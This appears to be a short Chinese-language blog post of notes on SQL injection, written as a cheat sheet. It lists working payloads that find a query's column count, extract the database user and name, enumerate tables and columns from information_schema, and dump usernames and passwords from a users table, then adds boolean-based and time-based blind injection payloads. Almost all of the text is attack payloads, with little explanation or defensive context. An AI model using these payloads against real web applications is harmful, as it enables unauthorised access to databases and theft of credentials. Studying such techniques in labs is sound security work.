sql注入记录

2021/12/14 2:17:40

本文主要是介绍sql注入记录,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

order by确定列数

id = 1' order by 5 --+

union确定匹配的列

id=0' union select 1,2,3 --+

获取相应的用户名和数据库名

id=0' union select 1,user(),database() --+

group_contact()函数

GROUP_CONCAT(expr)该函数将非空列值按照分组条件进行合并并最终返回。如果有空值,则返回为空

id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+


id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

id=0' union select id,group_concat(username,','),group_concat(password,',') from users --+

2. 盲注

2.1 布尔盲注获取长度

id=1' and length(database())=8 --+

2.2 时间盲注获取库名

substr(database(),1,1)```

' and if(1=0,1,sleep(10)) --+

?id=1' and if(ascii(substr(database(),1,1))=116,sleep(6),1) -


这篇关于sql注入记录的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程